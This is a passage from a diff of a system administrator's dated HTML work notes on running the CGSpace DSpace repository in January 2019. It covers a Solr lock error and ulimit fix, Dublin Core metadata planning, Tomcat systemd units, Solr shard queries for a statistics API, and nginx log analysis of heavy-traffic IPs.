+<li>Looking in the Solr log I see this:</li>
+</ul>
+<pre tabindex="0"><code>2019-01-16 13:37:55,395 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2018]: Error opening new searcher
+org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:491)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:466)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:575)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
+    at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+    at org.apache.solr.servlet.SolrDispatchFilter.handleAdminRequest(SolrDispatchFilter.java:729)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:258)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+    at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:845)
+    ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+    at org.apache.lucene.index.IndexWriter.&lt;init&gt;(IndexWriter.java:753)
+    at org.apache.solr.update.SolrIndexWriter.&lt;init&gt;(SolrIndexWriter.java:77)
+    at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+    at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+    at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+    ... 33 more
+2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
+    at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+    at org.apache.solr.servlet.SolrDispatchFilter.handleAdminRequest(SolrDispatchFilter.java:729)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:258)
+    at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: org.apache.solr.common.SolrException: Unable to create core [statistics-2018]
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:507)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:466)
+    at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:575)
+    ... 27 more
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
+    at org.apache.solr.core.CoreContainer.create(CoreContainer.java:491)
+    ... 29 more
+Caused by: org.apache.solr.common.SolrException: Error opening new searcher
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1565)
+    at org.apache.solr.core.SolrCore.getSearcher(SolrCore.java:1677)
+    at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:845)
+    ... 31 more
+Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+    at org.apache.lucene.store.Lock.obtain(Lock.java:89)
+    at org.apache.lucene.index.IndexWriter.&lt;init&gt;(IndexWriter.java:753)
+    at org.apache.solr.update.SolrIndexWriter.&lt;init&gt;(SolrIndexWriter.java:77)
+    at org.apache.solr.update.SolrIndexWriter.create(SolrIndexWriter.java:64)
+    at org.apache.solr.update.DefaultSolrCoreState.createMainIndexWriter(DefaultSolrCoreState.java:279)
+    at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
+    at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
+    ... 33 more
+</code></pre><ul>
+<li>I found some threads on StackOverflow etc discussing this and several suggested increasing the address space for the shell with ulimit</li>
+<li>I added <code>ulimit -v unlimited</code> to the <code>/etc/default/tomcat7</code> and restarted Tomcat and now Solr is working again:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/01/solr-stats-incorrect.png" alt="Solr stats working"></p>
+<ul>
+<li>Some StackOverflow discussions related to this:
+<ul>
+<li><a href="https://stackoverflow.com/questions/2895417/solrexception-internal-server-error/3035916#3035916">https://stackoverflow.com/questions/2895417/solrexception-internal-server-error/3035916#3035916</a></li>
+<li><a href="https://stackoverflow.com/questions/11683850/how-much-memory-could-vm-use">https://stackoverflow.com/questions/11683850/how-much-memory-could-vm-use</a></li>
+<li><a href="https://stackoverflow.com/questions/8892143/error-when-opening-a-lucene-index-map-failed/8893684#8893684">https://stackoverflow.com/questions/8892143/error-when-opening-a-lucene-index-map-failed/8893684#8893684</a></li>
+</ul>
+</li>
+<li>Abenet was asking if the Atmire Usage Stats are correct because they are over 2 million the last few months&hellip;</li>
+<li>For 2019-01 alone the Usage Stats are already around 1.2 million</li>
+<li>I tried to look in the nginx logs to see how many raw requests there are so far this month and it&rsquo;s about 1.4 million:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+1442874
+
+real    0m17.161s
+user    0m16.205s
+sys     0m2.396s
+</code></pre><h2 id="2019-01-17">2019-01-17</h2>
+<ul>
+<li>Send reminder to Atmire about purchasing the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">MQM module</a></li>
+<li>Trying to decide the solid action points for CGSpace on the CG Core 2.0 metadata&hellip;</li>
+<li>It&rsquo;s difficult to decide some of these because the current CG Core 2.0 document does not provide guidance or rationale (yet)!</li>
+<li>Also, there is not a good Dublin Core reference (or maybe I just don&rsquo;t understand?)</li>
+<li>Several authoritative documents on Dublin Core appear to be:
+<ul>
+<li><a href="http://dublincore.org/documents/dces/">Dublin Core Metadata Element Set, Version 1.1: Reference Description</a></li>
+<li><a href="http://www.dublincore.org/documents/dcmi-terms/">DCMI Metadata Terms</a></li>
+</ul>
+</li>
+<li>And what is the relationship between DC and DCTERMS?</li>
+<li>DSpace uses DCTERMS in the metadata it embeds in XMLUI item views!</li>
+<li>We really need to look at this more carefully and see the impacts that might be made from switching core fields like languages, abstract, authors, etc</li>
+<li>We can check WorldFish and MELSpace repositories to see what effects these changes have had on theirs because they have already adopted some of these changes&hellip;</li>
+<li>I think I understand the difference between DC and DCTERMS finally: DC is the original set of fifteen elements and DCTERMS is the newer version that was supposed to address much of the drawbacks of the original with regards to digital content</li>
+<li>We might be able to use some proper fields for citation, abstract, etc that are part of DCTERMS</li>
+<li>To make matters more confusing, there is also &ldquo;qualified Dublin Core&rdquo; that uses the original fifteen elements of legacy DC and qualifies them, like <code>dc.date.accessioned</code>
+<ul>
+<li>According to Wikipedia <a href="https://en.wikipedia.org/wiki/Dublin_Core">Qualified Dublin Core was superseded by DCTERMS in 2008</a>!</li>
+</ul>
+</li>
+<li>So we should be trying to use DCTERMS where possible, unless it is some internal thing that might mess up DSpace (like dates)</li>
+<li>&ldquo;Elements 1.1&rdquo; means legacy DC</li>
+<li>Possible action list for CGSpace:
+<ul>
+<li>dc.description.abstract → dcterms.abstract</li>
+<li>dc.description.version → cg.peer-reviewed (or cg.peer-review-status?)</li>
+<li>dc.description.sponsorship → cg.contributor.donor</li>
+<li>dc.contributor.author → dc.creator</li>
+<li>dc.language.iso → dcterms.language</li>
+<li>cg.identifier.url → dcterms.identifier</li>
+<li>dc.identifier.citation → dcterms.bibliographicCitation</li>
+<li>dc.relation.ispartofseries → dcterms.isPartOf</li>
+<li>cg.targetaudience → dcterms.audience</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-19">2019-01-19</h2>
+<ul>
+<li>
+<p>There&rsquo;s no official set of Dublin Core qualifiers so I can&rsquo;t tell if things like <code>dc.contributor.author</code> that are used by DSpace are official</p>
+</li>
+<li>
+<p>I found a great <a href="https://www.dri.ie/sites/default/files/files/qualified-dublin-core-metadata-guidelines.pdf">presentation from 2015 by the Digital Repository of Ireland</a> that discusses using MARC Relator Terms with Dublin Core elements</p>
+</li>
+<li>
+<p>It seems that <code>dc.contributor.author</code> would be a supported term according to this <a href="https://memory.loc.gov/diglib/loc.terms/relators/dc-contributor.html">Library of Congress list</a> linked from the <a href="http://dublincore.org/usage/documents/relators/">Dublin Core website</a></p>
+</li>
+<li>
+<p>The Library of Congress document specifically says:</p>
+<p>These terms conform with the DCMI Abstract Model and may be used in DCMI application profiles. DCMI endorses their use with Dublin Core elements as indicated.</p>
+</li>
+</ul>
+<h2 id="2019-01-20">2019-01-20</h2>
+<ul>
+<li>That&rsquo;s weird, I logged into DSpace Test (linode19) and it says it has been up for 213 days:</li>
+</ul>
+<pre tabindex="0"><code># w
+ 04:46:14 up 213 days,  7:25,  4 users,  load average: 1.94, 1.50, 1.35
+</code></pre><ul>
+<li>I&rsquo;ve definitely rebooted it several times in the past few months&hellip; according to <code>journalctl -b</code> it was a few weeks ago on 2019-01-02</li>
+<li>I re-ran the Ansible DSpace tag, ran all system updates, and rebooted the host</li>
+<li>After rebooting I notice that the Linode kernel went down from 4.19.8 to 4.18.16&hellip;</li>
+<li>Atmire sent a quote on our <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">ticket about purchasing the Metadata Quality Module (MQM) for DSpace 5.8</a></li>
+<li>Abenet asked me for an <a href="https://cgspace.cgiar.org/open-search/discover?query=crpsubject:Livestock&amp;sort_by=3&amp;order=DESC">OpenSearch query that could generate and RSS feed for items in the Livestock CRP</a></li>
+<li>According to my notes, <code>sort_by=3</code> is accession date (as configured in <code>dspace.cfg</code>)</li>
+<li>The query currently shows 3023 items, but a <a href="https://cgspace.cgiar.org/discover?filtertype_1=crpsubject&amp;filter_relational_operator_1=equals&amp;filter_1=Livestock&amp;submit_apply_filter=&amp;query=">Discovery search for Livestock CRP only returns 858 items</a></li>
+<li>That query seems to return items tagged with <code>Livestock and Fish</code> CRP as well&hellip; hmm.</li>
+</ul>
+<h2 id="2019-01-21">2019-01-21</h2>
+<ul>
+<li>Investigating running Tomcat 7 on Ubuntu 18.04 with the tarball and a custom systemd package instead of waiting for our DSpace to get compatible with Ubuntu 18.04&rsquo;s Tomcat 8.5</li>
+<li>I could either run with a simple <code>tomcat7.service</code> like this:</li>
+</ul>
+<pre tabindex="0"><code>[Unit]
+Description=Apache Tomcat 7 Web Application Container
+After=network.target
+[Service]
+Type=forking
+ExecStart=/path/to/apache-tomcat-7.0.92/bin/startup.sh
+ExecStop=/path/to/apache-tomcat-7.0.92/bin/shutdown.sh
+User=aorth
+Group=aorth
+[Install]
+WantedBy=multi-user.target
+</code></pre><ul>
+<li>Or try to use adapt a real systemd service like Arch Linux&rsquo;s:</li>
+</ul>
+<pre tabindex="0"><code>[Unit]
+Description=Tomcat 7 servlet container
+After=network.target
+
+[Service]
+Type=forking
+PIDFile=/var/run/tomcat7.pid
+Environment=CATALINA_PID=/var/run/tomcat7.pid
+Environment=TOMCAT_JAVA_HOME=/usr/lib/jvm/default-runtime
+Environment=CATALINA_HOME=/usr/share/tomcat7
+Environment=CATALINA_BASE=/usr/share/tomcat7
+Environment=CATALINA_OPTS=
+Environment=ERRFILE=SYSLOG
+Environment=OUTFILE=SYSLOG
+
+ExecStart=/usr/bin/jsvc \
+            -Dcatalina.home=${CATALINA_HOME} \
+            -Dcatalina.base=${CATALINA_BASE} \
+            -Djava.io.tmpdir=/var/tmp/tomcat7/temp \
+            -cp /usr/share/java/commons-daemon.jar:/usr/share/java/eclipse-ecj.jar:${CATALINA_HOME}/bin/bootstrap.jar:${CATALINA_HOME}/bin/tomcat-juli.jar \
+            -user tomcat7 \
+            -java-home ${TOMCAT_JAVA_HOME} \
+            -pidfile /var/run/tomcat7.pid \
+            -errfile ${ERRFILE} \
+            -outfile ${OUTFILE} \
+            $CATALINA_OPTS \
+            org.apache.catalina.startup.Bootstrap
+
+ExecStop=/usr/bin/jsvc \
+            -pidfile /var/run/tomcat7.pid \
+            -stop \
+            org.apache.catalina.startup.Bootstrap
+
+[Install]
+WantedBy=multi-user.target
+</code></pre><ul>
+<li>I see that <code>jsvc</code> and <code>libcommons-daemon-java</code> are both available on Ubuntu so that should be easy to port</li>
+<li>We probably don&rsquo;t need Eclipse Java Bytecode Compiler (ecj)</li>
+<li>I tested Tomcat 7.0.92 on Arch Linux using the <code>tomcat7.service</code> with <code>jsvc</code> and it works&hellip; nice!</li>
+<li>I think I might manage this the same way I do the restic releases in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a>, where I download a specific version and symlink to some generic location without the version number</li>
+<li>I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;33&#34; start=&#34;0&#34;&gt;
+$ http &#39;http://localhost:3000/solr/statistics-2018/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34;&gt;
+</code></pre><ul>
+<li>I opened an issue on the GitHub issue tracker (<a href="https://github.com/ilri/dspace-statistics-api/issues/10">#10</a>)</li>
+<li>I don&rsquo;t think the <a href="https://solrclient.readthedocs.io/en/latest/">SolrClient library</a> we are currently using supports these type of queries so we might have to just do raw queries with requests</li>
+<li>The <a href="https://github.com/django-haystack/pysolr">pysolr</a> library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):</li>
+</ul>
+<pre tabindex="0"><code>import pysolr
+solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
+results = solr.search(&#39;type:2&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;, &#39;facet&#39;: &#39;true&#39;, &#39;facet.field&#39;: &#39;id&#39;, &#39;facet.mincount&#39;: 1, &#39;facet.limit&#39;: 10, &#39;facet.offset&#39;: 0, &#39;rows&#39;: 0})
+print(results.facets[&#39;facet_fields&#39;])
+{&#39;id&#39;: [&#39;77572&#39;, 646, &#39;93185&#39;, 380, &#39;92932&#39;, 375, &#39;102499&#39;, 372, &#39;101430&#39;, 337, &#39;77632&#39;, 331, &#39;102449&#39;, 289, &#39;102485&#39;, 276, &#39;100849&#39;, 270, &#39;47080&#39;, 260]}
+</code></pre><ul>
+<li>If I double check one item from above, for example <code>77572</code>, it appears this is only working on the current statistics core and not the shards:</li>
+</ul>
+<pre tabindex="0"><code>import pysolr
+solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics&#39;)
+results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
+print(results.hits)
+646
+solr = pysolr.Solr(&#39;http://localhost:3000/solr/statistics-2018/&#39;)
+results = solr.search(&#39;type:2 id:77572&#39;, **{&#39;fq&#39;: &#39;isBot:false AND statistics_type:view&#39;})
+print(results.hits)
+595
+</code></pre><ul>
+<li>So I guess I need to figure out how to use join queries and maybe even switch to using raw Python requests with JSON</li>
+<li>This enumerates the list of Solr cores and returns JSON format:</li>
+</ul>
+<pre tabindex="0"><code>http://localhost:3000/solr/admin/cores?action=STATUS&amp;wt=json
+</code></pre><ul>
+<li>I think I figured out how to search across shards, I needed to give the whole URL to each other core</li>
+<li>Now I get more results when I start adding the other statistics cores:</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound&lt;result name=&#34;response&#34; numFound=&#34;2061320&#34; start=&#34;0&#34;&gt;
+$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;16280292&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
+$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;25606142&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
+$ http &#39;http://localhost:3000/solr/statistics/select?&amp;shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&amp;indent=on&amp;rows=0&amp;q=*:*&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;31532212&#34; start=&#34;0&#34; maxScore=&#34;1.0&#34;&gt;
+</code></pre><ul>
+<li>I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the <code>shards</code> parameter to each query to make the search distributed among the cores</li>
+<li>I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a <code>shards</code> query string</li>
+<li>A few things I noticed:
+<ul>
+<li>Solr doesn&rsquo;t mind if you use an empty <code>shards</code> parameter</li>
+<li>Solr doesn&rsquo;t mind if you have an extra comma at the end of the <code>shards</code> parameter</li>
+<li>If you are searching multiple cores, you need to include the base core in the <code>shards</code> parameter as well</li>
+<li>For example, compare the following two queries, first including the base core and the shard in the <code>shards</code> parameter, and then only including the shard:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;275&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
+$ http &#39;http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:2+id:11576&amp;fq=isBot:false&amp;fq=statistics_type:view&amp;shards=localhost:8081/solr/statistics-2018&#39; | grep numFound
+&lt;result name=&#34;response&#34; numFound=&#34;241&#34; start=&#34;0&#34; maxScore=&#34;12.205825&#34;&gt;
+</code></pre><h2 id="2019-01-22">2019-01-22</h2>
+<ul>
+<li>Release <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v0.9.0">version 0.9.0 of the dspace-statistics-api</a> to address the issue of querying multiple Solr statistics shards</li>
+<li>I deployed it on DSpace Test (linode19) and restarted the indexer and now it shows all the stats from 2018 as well (756 pages of views, intead of 6)</li>
+<li>I deployed it on CGSpace (linode18) and restarted the indexer as well</li>
+<li>Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Jan/2019:1(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    155 40.77.167.106
+    176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
+    189 107.21.16.70
+    217 54.83.93.85
+    310 46.174.208.142
+    346 83.103.94.48
+    360 45.5.186.2
+    595 154.113.73.30
+    716 196.191.127.37
+    915 35.237.175.180
+</code></pre><ul>
+<li>35.237.175.180 is known to us</li>
+<li>I don&rsquo;t think we&rsquo;ve seen 196.191.127.37 before. Its user agent is:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
+</code></pre><ul>
+<li>Interestingly this IP is located in Addis Ababa&hellip;</li>
+<li>Another interesting one is 154.113.73.30, which is apparently at IITA Nigeria and uses the user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+</code></pre><h2 id="2019-01-23">2019-01-23</h2>
+<ul>
+<li>Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:</li>
+</ul>
+<blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/ILRI?src=hash&amp;ref_src=twsrc%5Etfw">#ILRI</a> research:  Towards unlocking the potential of the hides and skins value chain in Somaliland <a href="https://t.co/EZH7ALW4dp">https://t.co/EZH7ALW4dp</a></p>&mdash; ILRI.org (@ILRI) <a href="https://twitter.com/ILRI/status/1086330519904673793?ref_src=twsrc%5Etfw">January 18, 2019</a></blockquote>
+<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
+
+<ul>
+<li>The shortened link is <a href="goo.gl/fb/VRj9Gq">goo.gl/fb/VRj9Gq</a> and it shows a &ldquo;Dynamic Link not found&rdquo; error from Firebase:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/01/firebase-link-not-found.png" alt="Dynamic Link not found"></p>
+<ul>
+<li>
+<p>Apparently Google announced last year that they plan to <a href="https://developers.googleblog.com/2018/03/transitioning-google-url-shortener.html">discontinue the shortner and transition to Firebase Dynamic Links in March, 2019</a>, so maybe this is related&hellip;</p>
+</li>
+<li>
+<p>Very interesting discussion of methods for <a href="https://jdebp.eu/FGA/systemd-house-of-horror/tomcat.html">running Tomcat under systemd</a></p>
+</li>
+<li>
+<p>We can set the ulimit options that used to be in <code>/etc/default/tomcat7</code> with systemd&rsquo;s <code>LimitNOFILE</code> and <code>LimitAS</code> (see the <code>systemd.exec</code> man page)</p>
+<ul>
+<li>Note that we need to use <code>infinity</code> instead of <code>unlimited</code> for the address space</li>
+</ul>
+</li>
+<li>
+<p>Create accounts for Bosun from IITA and Valerio from ICARDA / CGMEL on DSpace Test</p>
+</li>
+<li>
+<p>Maria Garruccio asked me for a list of author affiliations from all of their submitted items so she can clean them up</p>
+</li>
+<li>
+<p>I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/35501&#39;, &#39;10568/41728&#39;, &#39;10568/49622&#39;, &#39;10568/56589&#39;, &#39;10568/56592&#39;, &#39;10568/65064&#39;, &#39;10568/65718&#39;, &#39;10568/65719&#39;, &#39;10568/67373&#39;, &#39;10568/67731&#39;, &#39;10568/68235&#39;, &#39;10568/68546&#39;, &#39;10568/69089&#39;, &#39;10568/69160&#39;, &#39;10568/69419&#39;, &#39;10568/69556&#39;, &#39;10568/70131&#39;, &#39;10568/70252&#39;, &#39;10568/70978&#39;))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
+COPY 1109
+</code></pre><ul>
+<li>Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP</li>
+<li>Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    222 54.226.25.74
+    241 40.77.167.13
+    272 46.101.86.248
+    297 35.237.175.180
+    332 45.5.184.72
+    355 34.218.226.147
+    404 66.249.64.155
+   4637 205.186.128.185
+   4637 70.32.83.92
+   9265 45.5.186.2
+</code></pre><ul>
+<li>
+<p>I think it&rsquo;s the usual IPs:</p>
+<ul>
+<li>45.5.186.2 is CIAT</li>
+<li>70.32.83.92 is CCAFS</li>
+<li>205.186.128.185 is CCAFS or perhaps another Macaroni Bros harvester (new ILRI website?)</li>
+</ul>
+</li>
+<li>
+<p>Following up on the thumbnail issue that we had in <a href="/cgspace-notes/2018-12/">2018-12</a></p>
+</li>
+<li>
+<p>It looks like the two items with problematic PDFs both have thumbnails now:</p>
+<ul>
+<li><a href="https://hdl.handle.net/10568/98390">10568/98390</a></li>
+<li><a href="https://hdl.handle.net/10568/98391">10568/98391</a></li>
+</ul>
+</li>
+<li>
+<p>Just to make sure these were not uploaded by the user or something, I manually forced the regeneration of these with DSpace&rsquo;s <code>filter-media</code>:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
+$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98391
+</code></pre><ul>
